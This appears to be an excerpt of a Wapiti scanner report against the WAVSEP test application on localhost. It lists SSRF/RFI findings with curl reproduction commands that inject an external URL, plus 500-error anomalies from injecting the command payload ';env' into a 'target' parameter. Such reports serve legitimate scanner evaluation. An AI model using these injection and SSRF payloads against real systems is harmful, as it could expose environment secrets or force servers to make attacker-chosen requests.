GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:53+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/2703/746172676574/1527559553-174.119.60.74.txt
POST /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:42+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/2711/746172676574/1527559542-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/283/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/287/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/293/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/295/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/307/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/313/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/317/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/319/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:19+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/325/746172676574/1527559519-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:19+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/327/746172676574/1527559519-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:19+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/330/746172676574/1527559519-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:19+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/340/746172676574/1527559519-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
Solutions
Server Side Request Forgery solution
References


Internal Server Error

Description
Internal server error description

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%3Benv"

